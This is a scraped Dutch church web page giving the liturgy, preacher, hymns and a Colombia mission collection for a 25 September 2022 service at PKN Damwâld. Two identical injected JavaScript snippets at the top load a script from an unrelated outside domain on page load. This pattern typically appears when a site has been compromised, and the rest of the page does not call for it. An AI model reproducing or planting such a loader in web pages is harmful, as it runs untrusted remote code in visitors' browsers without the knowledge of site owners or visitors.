;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 25 september 2022 14:00 uur - PKN Damwâld
zondag 25 september 2022
14:00 uur

Kerkdienst zondag 25 september 2022 14:00 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Jelte Cuperus
LivestreamDienst terugkijken
Bekijk op Youtube
Liturgie
We zingen: ELB 376: 1 en 2
Welkomstwoord
We zingen: NLB 97:1 en 6
Stil gebed, Votum en groet
We zingen: NLB 65:1 en 2
Geloofsbelijdenis
We zingen: ELB 244b: 1 en 2
Gebed
We lezen: 2 Kon.6: 8 - 23
We zingen: NLB 67: 1 en 2
Preek .
We zingen: ELB 357: 3,4 en 5
Dankgebed en voorbede
We zingen: NLB 943:1,3,4 en 6
Zegen
Collecte
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Uitganscollecte: Collecte Kerk in Actie Zending Columbia

Collecte Kerk in Actie 2022 – Zending (Colombia) (collectenummer 22091)
In Colombia leed men 50 jaar lang onder een burgeroorlog met 220.000 doden, 5 miljoen ontheemden en 15 miljoen armen tot gevolg. Ruim honderd vrouwen van verschillende kerkelijke achtergronden willen zich samen inzetten voor blijvende vrede in hun land, maar ook in hun huis. Vrouwen en kinderen hebben namelijk nog vaak te lijden onder huiselijk geweld. Ze volgen samen bijbelcursussen en worden vaak diep geraakt door herkenbare bijbelverhalen waarin geweld voorkomt. Hoe ga je daarna verder? Wat zegt de Bijbel over vrede en verzoening? Hoe pas je dat toe in je eigen huis en woonplaats? Ze verspreiden hun kennis in hun eigen omgeving. Dat geeft vrouwen moed en kracht om diepgeworteld geweld tegen te gaan.